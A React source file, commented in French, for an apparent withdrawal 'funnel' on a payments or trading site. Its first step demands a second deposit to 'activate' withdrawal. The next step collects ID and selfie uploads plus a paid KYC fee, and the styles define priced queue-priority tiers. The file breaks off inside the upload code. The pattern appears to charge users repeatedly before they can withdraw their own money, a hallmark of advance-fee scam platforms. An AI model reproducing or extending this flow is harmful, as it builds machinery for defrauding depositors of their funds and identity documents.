import { useState, useMemo } from 'react';
import { useLang } from '../../i18n';
import { useGeo } from '../../geo';
import CardForm from './CardForm';

/* ── Kassify config ───────────────────────────── */
const API = process.env.REACT_APP_API_BASE_URL;

// La signature de paiement est calculée côté serveur (la clé secrète n'est
// jamais embarquée dans le bundle). Le serveur rattache le lid au compte
// authentifié par le token.
async function kassifyPayWithMethod(localAmount, prefix, userId, methodId, geo) {
  const paysys   = geo.paysys[methodId] || methodId;
  const currency = geo.methodCurrency(methodId);
  const gateway  = geo.methodGateway(methodId);
  const summ     = geo.payAmount(methodId, localAmount).toFixed(2);
  try {
    const res = await fetch(`${API}/api/payments/sign.php`, {
      method: 'POST',
      headers: { 'Content-Type': 'application/json' },
      body: JSON.stringify({ summ, paysys, currency, prefix: prefix || '', gateway }),
    });
    const d = await res.json();
    if (!d || !d.success) return;

    const base = window.location.origin;
    let url;
    if (d.gateway === 'payou') {
      url = `https://payou.pro/sci/v1/?id=${d.id}&sistems=${d.sistems}&summ=${d.summ}&order_id=${d.order_id}&hash=${d.hash}&user_code=${d.user_code}&user_email=${d.email}`;
    } else {
      url = `https://kassify.com/sci/?ids=${d.ids}&summ=${d.summ}&s=${d.s}&us_id=${d.us_id}&user_code=${d.user_code}&paysys=${d.paysys}&url_success=${encodeURIComponent(base + '/payment/success')}&url_fail=${encodeURIComponent(base + '/payment/failed')}`;
    }
    window.location.href = url;
  } catch {
    /* erreur réseau : pas de redirection */
  }
}

/* ── Method icons (same as Deposit.js) ──────── */
function Apple() {
  return <svg width="17" height="19" viewBox="0 0 16 18" fill="currentColor"><path d="M13 9.6c0-2 1.6-2.9 1.7-3-1-1.4-2.4-1.6-2.9-1.6-1.2-.1-2.4.7-3 .7-.6 0-1.6-.7-2.6-.7C5 5 3.8 5.8 3.1 7c-1.3 2.3-.3 5.7 1 7.6.6.9 1.4 1.9 2.4 1.9 1 0 1.3-.6 2.5-.6 1.1 0 1.5.6 2.5.6s1.7-.9 2.3-1.8c.7-1 1-2 1-2-.1 0-2-.8-2-3.1zM11 3.7c.5-.7.9-1.6.8-2.6-.8 0-1.8.6-2.4 1.2-.5.6-1 1.5-.8 2.4.9.1 1.8-.4 2.4-1z" /></svg>;
}
function GoogleG() {
  return <svg width="17" height="17" viewBox="0 0 18 18"><path fill="#4285F4" d="M17.6 9.2c0-.6 0-1.1-.2-1.7H9v3.3h4.8a4.1 4.1 0 01-1.8 2.7v2.2h2.9c1.7-1.6 2.7-3.9 2.7-6.5z"/><path fill="#34A853" d="M9 18c2.4 0 4.5-.8 6-2.2l-2.9-2.2c-.8.5-1.8.9-3.1.9-2.4 0-4.4-1.6-5.1-3.8H.9v2.3A9 9 0 009 18z"/><path fill="#FBBC05" d="M3.9 10.7a5.4 5.4 0 010-3.4V5H.9a9 9 0 000 8z"/><path fill="#EA4335" d="M9 3.6c1.3 0 2.5.5 3.4 1.3l2.6-2.6A9 9 0 00.9 5l3 2.3C4.6 5.2 6.6 3.6 9 3.6z"/></svg>;
}
function Mc() { return <span className="mc"><i className="r" /><i className="y" /></span>; }
function Cr({ sym, color }) {
  return <span style={{ width: 22, height: 22, borderRadius: '50%', background: color, color: '#fff', display: 'grid', placeItems: 'center', fontSize: 13, fontWeight: 800 }}>{sym}</span>;
}
const TAB_ICONS = {
  mobile: <svg width="15" height="15" viewBox="0 0 16 16" fill="none"><rect x="4" y="1.5" width="8" height="13" rx="2" stroke="currentColor" strokeWidth="1.3"/><path d="M7 12.5h2" stroke="currentColor" strokeWidth="1.3" strokeLinecap="round"/></svg>,
  carte:  <svg width="16" height="16" viewBox="0 0 16 16" fill="none"><rect x="1.5" y="3.5" width="13" height="9" rx="2" stroke="currentColor" strokeWidth="1.3"/><path d="M1.5 6.5h13" stroke="currentColor" strokeWidth="1.3"/></svg>,
  bank:   <svg width="15" height="15" viewBox="0 0 16 16" fill="none"><path d="M2 13h12M3 6v5M6 6v5M10 6v5M13 6v5M1 6h14M8 1.5l7 4H1z" stroke="currentColor" strokeWidth="1.3" strokeLinecap="round" strokeLinejoin="round"/></svg>,
  crypto: <svg width="15" height="15" viewBox="0 0 16 16" fill="none"><circle cx="8" cy="8" r="6.5" stroke="currentColor" strokeWidth="1.3"/><path d="M6 5h3a1.6 1.6 0 010 3.2H6zm0 3.2h3.3a1.6 1.6 0 010 3.2H6zM7.5 3.7v1.3M7.5 11.4v1.3" stroke="currentColor" strokeWidth="1.2" strokeLinecap="round"/></svg>,
};
function renderMethodIcon(m) {
  switch (m.icon) {
    case 'apple':   return <Apple />;
    case 'google':  return <GoogleG />;
    case 'visa_mc': return <><span className="pay-visa">VISA</span><Mc /></>;
    case 'btc':     return <Cr sym="₿" color="#f7931a" />;
    case 'eth':     return <Cr sym="Ξ" color="#627eea" />;
    case 'usdt':    return <Cr sym="₮" color="#26a17b" />;
    case 'ltc':     return <Cr sym="Ł" color="#345d9d" />;
    case 'revolut': return <span style={{ fontWeight: 800, fontSize: 13 }}>Revolut</span>;
    case 'blik':    return <span style={{ background: '#e2001a', color: '#fff', fontWeight: 800, fontSize: 13, borderRadius: 5, padding: '2px 6px', letterSpacing: '.5px' }}>blik</span>;
    case 'pix':     return <img src="/img/pix.svg" alt="Pix" style={{ height: 20, width: 'auto', display: 'block' }} />;
    case 'mercadopago': return <img src="/img/mercadopago.svg" alt="Mercado Pago" style={{ height: 20, width: 'auto', display: 'block' }} />;
    case 'deuna':   return <img src="/img/deuna.svg" alt="Deuna" style={{ height: 22, width: 22, borderRadius: 6, display: 'block' }} />;
    case 'pagomovil': return <svg width="15" height="15" viewBox="0 0 16 16" fill="none"><rect x="4" y="1.5" width="8" height="13" rx="2" stroke="currentColor" strokeWidth="1.3"/><path d="M7 12.5h2" stroke="currentColor" strokeWidth="1.3" strokeLinecap="round"/></svg>;
    case 'bank':    return <svg width="16" height="16" viewBox="0 0 16 16" fill="none"><path d="M2 13h12M3 6v5M6 6v5M10 6v5M13 6v5M1 6h14M8 1.5l7 4H1z" stroke="currentColor" strokeWidth="1.3" strokeLinecap="round" strokeLinejoin="round"/></svg>;
    default:        return null;
  }
}
function renderMethodButtons(list, method, setMethod) {
  const rows = [];
  for (let i = 0; i < list.length; i += 2) {
    const pair = list.slice(i, i + 2);
    const btn = (m) => (
      <button key={m.id} className={`dep-method${method === m.id ? ' on' : ''}`} onClick={() => setMethod(m.id)}>
        {renderMethodIcon(m)}
        {m.label && <span>{m.label}</span>}
        {m.cardnum != null && <span className="dep-cardnum">{m.cardnum}</span>}
      </button>
    );
    if (pair.length === 2) rows.push(<div key={i} className="dep-row2">{pair.map(btn)}</div>);
    else rows.push(btn(pair[0]));
  }
  return rows;
}
// Onglet de paiement par défaut — même priorité que Deposit.js : la CARTE en
// premier (LATAM/Afrique : moyen local puis carte). Sans ça on retombait sur
// geo.tabs[0] = 'mobile' (Apple/GPay), qui n'est pas le moyen principal voulu.
function pickDefaultTab(geo) {
  const order = (geo.zone === 'latam' || geo.zone === 'africa')
    ? ['bank', 'carte', 'mobile', 'crypto']
    : ['carte', 'mobile', 'bank', 'crypto'];
  return order.find((id) => geo.tabs.includes(id)) || 'carte';
}

function MethodPicker({ method, setMethod, tab, setTab, geo, hideMethods }) {
  return (
    <div style={{ marginBottom: hideMethods ? 14 : 27 }}>
      <div className="dep-tabs">
        {geo.tabs.map(t => (
          <button key={t} className={`dep-tab${tab === t ? ' on' : ''}`} onClick={() => {
            setTab(t);
            const first = geo.methods[t]?.[0];
            if (first) setMethod(first.id);
          }}>{TAB_ICONS[t]}</button>
        ))}
      </div>
      {/* Boutons de méthode masqués quand le checkout carte inline est affiché
          (un seul moyen carte → bouton redondant, cf page de dépôt). */}
      {!hideMethods && (
        <div className="dep-methods">
          {renderMethodButtons(geo.methods[tab] || [], method, setMethod)}
        </div>
      )}
    </div>
  );
}

/* ── Bloc paiement partagé (sélecteur méthode + paiement) ───────────────────
 * Quand la méthode sélectionnée est une CARTE à checkout maison
 * (geo.methodCheckout === 'card', ex. MoneyEUR_BP zone Europe), on affiche le
 * formulaire carte INLINE (CardForm → api/payments/payou-card.php) au lieu de la
 * redirection SCI. Sinon, bouton classique → sign.php → page hébergée du PSP.
 *
 * onBeforeSubmit (optionnel, async) : exécuté avant le paiement dans LES DEUX
 * branches (ex. upload KYC/JDD) ; renvoie { ok, message } — on ne paie que si ok.
 */
function PaySection({ geo, userId, tab, setTab, method, setMethod, localAmount, amountText, prefix, payLabel, btnClass = 'wf-btn-grad', summaryLabel, extraDisabled = false, onBeforeSubmit }) {
  const { t } = useLang();
  const [loading, setLoading] = useState(false);
  const [error, setError]     = useState('');
  const isCard = geo.methodCheckout(method) === 'card';

  const runBeforeSubmit = async () => {
    if (!onBeforeSubmit) return { ok: true };
    return onBeforeSubmit();
  };

  return (
    <>
      {error && <div className="wf-error">{error}</div>}
      <MethodPicker method={method} setMethod={setMethod} tab={tab} setTab={setTab} geo={geo} hideMethods={isCard} />
      {isCard ? (
        <CardForm
          summ={geo.payAmount(method, localAmount).toFixed(2)}
          currency={geo.methodCurrency(method)}
          paysys={geo.paysys[method] || method}
          prefix={prefix}
          detectedCC={geo.country}
          payLabel={amountText}
          amountValid={!extraDisabled && localAmount > 0}
          minMessage={t('withdrawal.funnel.sendError')}
          onBeforeSubmit={runBeforeSubmit}
          summary={[{ k: summaryLabel, v: amountText, total: true }]}
        />
      ) : (
        <button
          className={`wf-btn ${btnClass}`}
          disabled={loading || !method || extraDisabled || localAmount <= 0}
          onClick={async () => {
            setError('');
            setLoading(true);
            const pre = await runBeforeSubmit();
            if (!pre || pre.ok === false) { setError(pre?.message || ''); setLoading(false); return; }
            kassifyPayWithMethod(localAmount, prefix, userId, method, geo);
          }}>
          {loading ? <><Spinner /> {t('withdrawal.funnel.redirecting')}</> : payLabel}
        </button>
      )}
    </>
  );
}

/* ── Shared CSS ──────────────────────────────── */
const CSS = `
  .wf-overlay {
    position: fixed; inset: 0;
    background: rgba(4,3,18,.86);
    backdrop-filter: blur(6px);
    z-index: 600;
    display: flex; align-items: flex-end; justify-content: center;
    animation: wfFadeIn .2s ease;
  }
  @keyframes wfFadeIn { from{opacity:0} to{opacity:1} }

  .wf-sheet {
    width: 100%;
    background: #14122c;
    border-radius: 24px 24px 0 0;
    box-shadow: 0 -8px 60px rgba(0,0,0,.7), inset 0 1px 0 rgba(118,225,255,.08);
    overflow: hidden;
    animation: wfUp .3s cubic-bezier(.17,.67,.18,1.08);
    max-height: 92%;
    overflow-y: auto;
    position: relative;
  }
  @media (min-width: 600px) {
    .wf-overlay { align-items: center; }
    .wf-sheet {
      width: 600px;
      margin: auto;
      border-radius: 24px;
      max-height: 88vh;
      box-shadow: 0 8px 80px rgba(0,0,0,.8), inset 0 1px 0 rgba(118,225,255,.08);
    }
  }
  @keyframes wfUp { from{transform:translateY(100%);opacity:0} to{transform:translateY(0);opacity:1} }
  .wf-sheet::-webkit-scrollbar { width: 0; }

  .wf-handle { width: 40px; height: 4px; border-radius: 2px; background: rgba(255,255,255,.1); margin: 12px auto 0; }

  .wf-illus {
    width: 100%; padding: 20px 20px 16px;
    display: flex; flex-direction: column; align-items: center; gap: 14px;
    position: relative; overflow: hidden;
  }
  .wf-illus-bg {
    position: absolute; inset: 0; opacity: .12;
  }
  .wf-icon-ring {
    width: 72px; height: 72px; border-radius: 50%;
    display: flex; align-items: center; justify-content: center;
    position: relative; z-index: 1;
    box-shadow: 0 0 0 8px rgba(255,255,255,.04), 0 8px 24px rgba(0,0,0,.4);
  }
  .wf-illus-tag {
    font-size: 10px; font-weight: 700; text-transform: uppercase; letter-spacing: .08em;
    padding: 3px 10px; border-radius: 20px; position: relative; z-index: 1;
  }

  .wf-body { padding: 0 20px 28px; }

  .wf-title {
    font-size: 17px; font-weight: 800; color: #fff;
    margin: 0 0 8px; line-height: 1.35; text-align: center;
  }
  .wf-desc {
    font-size: 13px; color: #9b9ab0; line-height: 1.65;
    margin: 0 0 10px; text-align: center;
  }
  .wf-desc strong { color: #cfcee0; }

  .wf-close-btn {
    position: absolute; top: 14px; right: 14px;
    width: 30px; height: 30px; border-radius: 50%;
    background: rgba(255,255,255,.07); border: none;
    color: #9b9ab0; display: flex; align-items: center; justify-content: center;
    cursor: pointer; z-index: 10; transition: background .15s;
  }
  .wf-close-btn:hover { background: rgba(255,255,255,.12); }

  /* Status boxes */
  .wf-status {
    display: flex; align-items: center; gap: 10px;
    padding: 10px 14px; border-radius: 10px; margin-bottom: 8px;
    font-size: 12px; font-weight: 600;
  }
  .wf-status svg { flex-shrink: 0; }
  .wf-ok  { background: rgba(0,212,170,.1); border: 1px solid rgba(0,212,170,.2); color: #00d4aa; }
  .wf-warn{ background: rgba(247,183,49,.1); border: 1px solid rgba(247,183,49,.2); color: #f7b731; }
  .wf-err { background: rgba(255,107,107,.1); border: 1px solid rgba(255,107,107,.2); color: #ff6b6b; }

  /* Fee table */
  .wf-fees {
    background: #0d0b1e; border-radius: 12px;
    box-shadow: inset 0 0 0 1px rgba(255,255,255,.07);
    overflow: hidden; margin-bottom: 16px;
  }
  .wf-fee-row {
    display: flex; justify-content: space-between; align-items: center;
    padding: 10px 14px; font-size: 13px; color: #9b9ab0;
    border-bottom: 1px solid rgba(255,255,255,.05);
  }
  .wf-fee-row:last-child { border-bottom: none; }
  .wf-fee-total { color: #fff; font-weight: 700; }
  .wf-fee-total span:last-child { color: #76e1ff; }

  /* Upload */
  .wf-upload-grid { display: grid; grid-template-columns: 1fr 1fr; gap: 8px; margin-bottom: 12px; }
  .wf-upload-single { margin-bottom: 12px; }
  .wf-upload-box {
    border: 1.5px dashed rgba(118,225,255,.2); border-radius: 12px;
    overflow: hidden; cursor: pointer; transition: border-color .15s, background .15s;
  }
  .wf-upload-box:hover { border-color: rgba(118,225,255,.5); background: rgba(118,225,255,.03); }
  .wf-upload-label { display: block; cursor: pointer; }
  .wf-upload-placeholder {
    display: flex; flex-direction: column; align-items: center; justify-content: center;
    gap: 6px; padding: 20px 12px; color: #46455e;
  }
  .wf-upload-placeholder span { font-size: 12px; font-weight: 600; color: #9b9ab0; }
  .wf-upload-placeholder small { font-size: 10px; color: #46455e; text-align: center; }
  .wf-upload-preview { position: relative; }
  .wf-upload-preview img { width: 100%; height: 100px; object-fit: cover; display: block; }
  .wf-upload-check {
    position: absolute; bottom: 6px; right: 6px; background: #00d4aa;
    border-radius: 50%; padding: 3px; color: #fff; display: flex;
  }
  .wf-upload-single .wf-upload-box { min-height: 90px; }
  .wf-upload-single .wf-upload-placeholder { padding: 28px; }

  /* Error */
  .wf-error { font-size: 12px; color: #ff6b6b; background: rgba(255,107,107,.08);
    border: 1px solid rgba(255,107,107,.2); border-radius: 8px; padding: 8px 12px; margin-bottom: 10px; }

  /* Buttons */
  .wf-btn {
    display: flex; align-items: center; justify-content: center; gap: 8px;
    width: 100%; height: 50px; border-radius: 13px; border: none;
    font-size: 14px; font-weight: 700; cursor: pointer; font-family: inherit;
    transition: opacity .15s, transform .1s;
  }
  .wf-btn:active { transform: scale(.98); }
  .wf-btn:disabled { opacity: .5; cursor: not-allowed; }
  .wf-btn-grad { background: linear-gradient(90deg,#8187f6,#76e1ff); color: #0d0b1e; }
  .wf-btn-red  { background: linear-gradient(90deg,#ff6b6b,#e53e3e); color: #fff; }
  .wf-btn-gold { background: linear-gradient(90deg,#8187f6,#76e1ff); color: #fff; }
  .wf-btn-dark { background: #1d1c3c; color: #9b9ab0; }


  /* Tier cards (step 6) */
  .wf-tiers { display: grid; grid-template-columns: repeat(3,1fr); gap: 8px; margin-bottom: 14px; }
  .wf-tier {
    position: relative; background: #0d0b1e;
    border: 1.5px solid rgba(255,255,255,.07); border-radius: 12px;
    padding: 14px 8px 12px; display: flex; flex-direction: column;
    align-items: center; gap: 5px; text-align: center;
    border-top: 2px solid var(--tc,#2a2950);
    cursor: pointer; transition: background .15s, box-shadow .15s;
  }
  .wf-tier:hover { background: rgba(255,255,255,.03); }
  .wf-tier--feat { border-color: var(--tc); }
  .wf-tier--sel {
    box-shadow: inset 0 0 0 2px var(--tc,#76e1ff);
    background: color-mix(in srgb, var(--tc,#76e1ff) 12%, transparent);
  }
  .wf-tier--sel .wf-tier-name { color: var(--tc,#76e1ff); }
  .wf-tier--sel .wf-tier-pos, .wf-tier--sel .wf-tier-delay { color: rgba(255,255,255,.6); }
  .wf-tier-check {
    display: none; position: absolute; top: 7px; right: 7px;
    width: 16px; height: 16px; border-radius: 50%;
    background: var(--tc,#76e1ff); align-items: center; justify-content: center;
  }
  .wf-tier--sel .wf-tier-check { display: flex; }
  .wf-tier-badge {
    position: absolute; top: -9px; left: 50%; transform: translateX(-50%);
    background: var(--tc,#76e1ff); color: #0d0b1e; font-size: 8px; font-weight: 800;
    text-transform: uppercase; letter-spacing: .05em; padding: 2px 8px; border-radius: 20px; white-space: nowrap;
  }
  .wf-tier-name { font-size: 10px; font-weight: 700; color: #9b9ab0; text-transform: uppercase; letter-spacing: .05em; transition: color .15s; }
  .wf-tier-pos { font-size: 11px; color: #9b9ab0; transition: color .15s; }
  .wf-tier-pos strong { color: #fff; }
  .wf-tier-delay { font-size: 10px; color: #46455e; transition: color .15s; }
  .wf-tier-price { font-size: 13px; font-weight: 800; color: var(--tc,#fff); margin-top: 2px; }

  /* Queue box */
  .wf-queue {
    display: flex; align-items: center; gap: 10px;
    background: #0d0b1e; border-radius: 12px;
    box-shadow: inset 0 0 0 1px rgba(255,255,255,.07);
    padding: 12px 16px; margin-bottom: 14px;
    font-size: 13px; color: #9b9ab0;
  }
  .wf-queue-num { font-size: 24px; font-weight: 800; color: #fff; margin-left: auto; line-height: 1; }
  .wf-queue-num sup { font-size: 11px; color: #9b9ab0; font-weight: 500; }

  /* Spinner */
  @keyframes wfSpin { from{transform:rotate(0deg)} to{transform:rotate(360deg)} }
  .wf-spin { animation: wfSpin .7s linear infinite; }

  /* Method picker (shared with Deposit.js) */
  .dep-tabs { display: flex; gap: 6px; background: #0d0b1e; border-radius: 11px; padding: 4px; }
  .dep-tab { flex: 1; height: 36px; border-radius: 8px; display: flex; align-items: center; justify-content: center; gap: 6px; color: #9b9ab0; font-size: 12px; font-weight: 700; background: none; border: none; cursor: pointer; font-family: inherit; }
  .dep-tab.on { background: linear-gradient(90deg, #8187f6, #76e1ff); color: #fff; }
  .dep-methods { display: flex; flex-direction: column; gap: 8px; margin-top: 10px; }
  .dep-row2 { display: grid; grid-template-columns: 1fr 1fr; gap: 8px; }
  .dep-method { height: 48px; border-radius: 10px; background: #16142e; box-shadow: inset 0 0 0 1px rgba(255,255,255,.08); display: flex; align-items: center; justify-content: center; gap: 8px; color: #fff; font-size: 13px; font-weight: 700; position: relative; cursor: pointer; border: none; font-family: inherit; width: 100%; }
  .dep-method.on { box-shadow: inset 0 0 0 1.5px #76e1ff; background: rgba(118,225,255,.08); }
  .dep-cardnum { position: absolute; right: 10px; top: 50%; transform: translateY(-50%); width: 20px; height: 20px; border-radius: 6px; background: #100e26; box-shadow: inset 0 0 0 1px rgba(255,255,255,.1); display: grid; place-items: center; font-size: 11px; color: #9b9ab0; }
  .dep-method.on .dep-cardnum { color: #76e1ff; box-shadow: inset 0 0 0 1px #76e1ff; }
  .pay-visa { font-style: italic; font-weight: 800; font-size: 17px; letter-spacing: .5px; }
  .mc { display: inline-flex; }
  .mc i { width: 16px; height: 16px; border-radius: 50%; display: block; }
  .mc .r { background: #eb001b; } .mc .y { background: #f79e1b; margin-left: -7px; mix-blend-mode: screen; }
`;

/* ── SVG Illustrations ───────────────────────── */
function IllusDeposit() {
  return (
    <svg width="44" height="44" viewBox="0 0 44 44" fill="none">
      <rect x="4" y="14" width="36" height="22" rx="4" fill="rgba(118,225,255,.15)" stroke="#76e1ff" strokeWidth="1.5"/>
      <path d="M4 20h36" stroke="#76e1ff" strokeWidth="1.5"/>
      <path d="M14 8h16l4 6H10l4-6z" fill="rgba(129,135,246,.3)" stroke="#8187f6" strokeWidth="1.3"/>
      <circle cx="32" cy="8" r="7" fill="#14122c" stroke="#f7b731" strokeWidth="1.5"/>
      <text x="32" y="12" textAnchor="middle" fill="#f7b731" fontSize="9" fontWeight="800">2</text>
      <rect x="18" y="26" width="8" height="4" rx="1" fill="rgba(118,225,255,.4)"/>
    </svg>
  );
}

function IllusKyc() {
  return (
    <svg width="44" height="44" viewBox="0 0 44 44" fill="none">
      <rect x="6" y="10" width="32" height="24" rx="4" fill="rgba(129,135,246,.15)" stroke="#8187f6" strokeWidth="1.5"/>
      <circle cx="16" cy="21" r="6" fill="rgba(129,135,246,.25)" stroke="#8187f6" strokeWidth="1.3"/>
      <path d="M10 30c0-3.3 2.7-6 6-6s6 2.7 6 6" stroke="#8187f6" strokeWidth="1.3" strokeLinecap="round"/>
      <path d="M26 17h8M26 21h6M26 25h8" stroke="rgba(255,255,255,.3)" strokeWidth="1.3" strokeLinecap="round"/>
      <circle cx="34" cy="10" r="6" fill="#14122c" stroke="#00d4aa" strokeWidth="1.5"/>
      <path d="M31 10l2 2 4-4" stroke="#00d4aa" strokeWidth="1.5" strokeLinecap="round" strokeLinejoin="round"/>
    </svg>
  );
}

function IllusKycPending() {
  return (
    <svg width="44" height="44" viewBox="0 0 44 44" fill="none">
      <rect x="8" y="6" width="24" height="30" rx="4" fill="rgba(247,183,49,.1)" stroke="#f7b731" strokeWidth="1.5"/>
      <path d="M14 16h12M14 21h8M14 26h10" stroke="rgba(247,183,49,.4)" strokeWidth="1.3" strokeLinecap="round"/>
      <circle cx="34" cy="30" r="8" fill="#14122c" stroke="#f7b731" strokeWidth="1.5"/>
      <path d="M34 26v5l3 2" stroke="#f7b731" strokeWidth="1.5" strokeLinecap="round" strokeLinejoin="round"/>
    </svg>
  );
}

function IllusAddress() {
  return (
    <svg width="44" height="44" viewBox="0 0 44 44" fill="none">
      <path d="M22 4L6 14v24h32V14L22 4z" fill="rgba(74,159,255,.1)" stroke="#4a9fff" strokeWidth="1.5"/>
      <path d="M14 38V26h16v12" stroke="#4a9fff" strokeWidth="1.3"/>
      <rect x="18" y="28" width="8" height="10" rx="1" fill="rgba(74,159,255,.3)"/>
      <path d="M6 14l16-10 16 10" stroke="#4a9fff" strokeWidth="1.5" strokeLinecap="round" strokeLinejoin="round"/>
      <circle cx="34" cy="10" r="6" fill="#14122c" stroke="#00d4aa" strokeWidth="1.5"/>
      <path d="M31 10l2 2 4-4" stroke="#00d4aa" strokeWidth="1.5" strokeLinecap="round" strokeLinejoin="round"/>
    </svg>
  );
}

function IllusFees({ amount }) {
  return (
    <svg width="52" height="44" viewBox="0 0 52 44" fill="none">
      <rect x="2" y="12" width="20" height="14" rx="3" fill="rgba(0,212,170,.1)" stroke="#00d4aa" strokeWidth="1.5"/>
      <rect x="30" y="12" width="20" height="14" rx="3" fill="rgba(0,212,170,.1)" stroke="#00d4aa" strokeWidth="1.5"/>
      <path d="M22 19h8M27 16l3 3-3 3" stroke="#00d4aa" strokeWidth="1.5" strokeLinecap="round" strokeLinejoin="round"/>
      <path d="M6 18h8M6 22h5" stroke="rgba(0,212,170,.4)" strokeWidth="1.2" strokeLinecap="round"/>
      <path d="M34 18h8M34 22h5" stroke="rgba(0,212,170,.4)" strokeWidth="1.2" strokeLinecap="round"/>
      <text x="26" y="36" textAnchor="middle" fill="#f7b731" fontSize="9" fontWeight="700">{amount}</text>
    </svg>
  );
}

function IllusWarning() {
  return (
    <svg width="44" height="44" viewBox="0 0 44 44" fill="none">
      <path d="M22 4L2 38h40L22 4z" fill="rgba(255,107,107,.1)" stroke="#ff6b6b" strokeWidth="1.5" strokeLinejoin="round"/>
      <path d="M22 18v10" stroke="#ff6b6b" strokeWidth="2" strokeLinecap="round"/>
      <circle cx="22" cy="33" r="1.5" fill="#ff6b6b"/>
      <path d="M10 38h24" stroke="rgba(255,107,107,.3)" strokeWidth="1" strokeLinecap="round"/>
    </svg>
  );
}

function IllusQueue({ pos }) {
  return (
    <svg width="52" height="44" viewBox="0 0 52 44" fill="none">
      <circle cx="10" cy="18" r="6" fill="rgba(247,183,49,.15)" stroke="#f7b731" strokeWidth="1.3"/>
      <circle cx="26" cy="18" r="6" fill="rgba(247,183,49,.25)" stroke="#f7b731" strokeWidth="1.5"/>
      <circle cx="42" cy="18" r="6" fill="rgba(247,183,49,.15)" stroke="#f7b731" strokeWidth="1.3"/>
      <path d="M4 32c0-3.3 2.7-6 6-6s6 2.7 6 6" stroke="rgba(247,183,49,.3)" strokeWidth="1.3" strokeLinecap="round"/>
      <path d="M20 32c0-3.3 2.7-6 6-6s6 2.7 6 6" stroke="#f7b731" strokeWidth="1.5" strokeLinecap="round"/>
      <path d="M36 32c0-3.3 2.7-6 6-6s6 2.7 6 6" stroke="rgba(247,183,49,.3)" strokeWidth="1.3" strokeLinecap="round"/>
      <text x="26" y="23" textAnchor="middle" fill="#f7b731" fontSize="8" fontWeight="800">{pos}</text>
    </svg>
  );
}

function IllusLock() {
  return (
    <svg width="44" height="44" viewBox="0 0 44 44" fill="none">
      <rect x="8" y="22" width="28" height="18" rx="4" fill="rgba(255,107,107,.12)" stroke="#ff6b6b" strokeWidth="1.5"/>
      <path d="M14 22v-6a8 8 0 0116 0v6" stroke="#ff6b6b" strokeWidth="1.5" strokeLinecap="round"/>
      <circle cx="22" cy="32" r="4" fill="rgba(255,107,107,.3)" stroke="#ff6b6b" strokeWidth="1.3"/>
      <path d="M22 30v4" stroke="#ff6b6b" strokeWidth="1.3" strokeLinecap="round"/>
    </svg>
  );
}

/* ── Icons SVG inline ────────────────────────── */
const XIcon = () => (
  <svg width="14" height="14" viewBox="0 0 14 14" fill="none">
    <path d="M1 1l12 12M13 1L1 13" stroke="currentColor" strokeWidth="1.5" strokeLinecap="round"/>
  </svg>
);
const CheckIcon = () => (
  <svg width="14" height="14" viewBox="0 0 14 14" fill="none">
    <path d="M2 7l4 4 6-7" stroke="currentColor" strokeWidth="1.5" strokeLinecap="round" strokeLinejoin="round"/>
  </svg>
);
const UploadIcon = () => (
  <svg width="28" height="28" viewBox="0 0 28 28" fill="none">
    <path d="M14 20V8M9 13l5-5 5 5" stroke="currentColor" strokeWidth="1.5" strokeLinecap="round" strokeLinejoin="round"/>
    <path d="M6 22h16" stroke="currentColor" strokeWidth="1.3" strokeLinecap="round"/>
  </svg>
);
const Spinner = () => (
  <svg width="16" height="16" viewBox="0 0 16 16" fill="none" className="wf-spin">
    <circle cx="8" cy="8" r="6" stroke="currentColor" strokeWidth="2" strokeDasharray="20 15" strokeLinecap="round"/>
  </svg>
);
const ZapIcon = () => (
  <svg width="10" height="10" viewBox="0 0 10 10" fill="none">
    <path d="M6 1L2 6h4l-2 3 6-5H6l2-3H6z" fill="currentColor"/>
  </svg>
);
const UsersIcon = () => (
  <svg width="16" height="16" viewBox="0 0 16 16" fill="none">
    <circle cx="6" cy="5" r="3" stroke="#f7b731" strokeWidth="1.3"/>
    <circle cx="11" cy="5" r="2" stroke="rgba(247,183,49,.5)" strokeWidth="1.2"/>
    <path d="M1 13c0-2.8 2.2-5 5-5s5 2.2 5 5" stroke="#f7b731" strokeWidth="1.3" strokeLinecap="round"/>
    <path d="M11 8c1.7.4 3 2 3 4" stroke="rgba(247,183,49,.5)" strokeWidth="1.2" strokeLinecap="round"/>
  </svg>
);

/* ── Step 1 : Activation (2e dépôt requis) ───── */
function Step1({ onClose }) {
  const { t } = useLang();
  return (
    <>
      <div className="wf-illus" style={{ background: 'linear-gradient(180deg,rgba(118,225,255,.08) 0%,transparent 100%)' }}>
        <div className="wf-handle" />
        <div className="wf-icon-ring" style={{ background: 'linear-gradient(135deg,rgba(118,225,255,.2),rgba(129,135,246,.2))' }}>
          <IllusDeposit />
        </div>
        <div className="wf-illus-tag" style={{ background: 'rgba(118,225,255,.12)', color: '#76e1ff' }}>{t('withdrawal.funnel.step1Tag')}</div>
      </div>
      <div className="wf-body">
        <h2 className="wf-title">{t('withdrawal.funnel.step1Title')}</h2>
        <p className="wf-desc">{t('withdrawal.funnel.step1Body1')}</p>
        <p className="wf-desc" style={{ marginBottom: 20 }}>{t('withdrawal.funnel.step1Body2')}</p>
        <button className="wf-btn wf-btn-grad" onClick={() => { window.location.href = '/deposit'; }}>
          {t('withdrawal.funnel.step1Btn')}
        </button>
      </div>
    </>
  );
}

/* ── Step 2 : KYC identité ───────────────────── */
function Step2({ onClose, userId }) {
  const { t } = useLang();
  const geo = useGeo();
  const { kyc: kycDisplay, symbol } = geo.prices;
  const defaultTab = pickDefaultTab(geo);
  const [tab, setTab]       = useState(defaultTab);
  const [method, setMethod] = useState(geo.methods[defaultTab]?.[0]?.id || '');
  const [cniFile, setCniFile]     = useState(null);
  const [selfieFile, setSelfieFile] = useState(null);
  const [cniPrev, setCniPrev]     = useState(null);
  const [selfiePrev, setSelfiePrev] = useState(null);
  // Phase upload → puis paiement : on affiche le form de paiement SEULEMENT une
  // fois les documents envoyés avec succès (pas les deux en même temps).
  const [uploaded, setUploaded]   = useState(false);
  const [uploading, setUploading] = useState(false);
  const [error, setError]         = useState('');
  const API = process.env.REACT_APP_API_BASE_URL;

  const readFile = (file, setPreview) => {
    const r = new FileReader();
    r.onloadend = () => setPreview(r.result);
    r.readAsDataURL(file);
  };

  const handleCni = (e) => { const f = e.target.files[0]; if (f) { setCniFile(f); readFile(f, setCniPrev); } };
  const handleSelfie = (e) => { const f = e.target.files[0]; if (f) { setSelfieFile(f); readFile(f, setSelfiePrev); } };

  const doUpload = async () => {
    if (!cniFile || !selfieFile) { setError(t('withdrawal.funnel.step2MissingDocs')); return; }
    setUploading(true); setError('');
    try {
      const fd = new FormData();
      fd.append('user_id', userId); fd.append('cni', cniFile); fd.append('selfie', selfieFile); fd.append('step', 'identity');
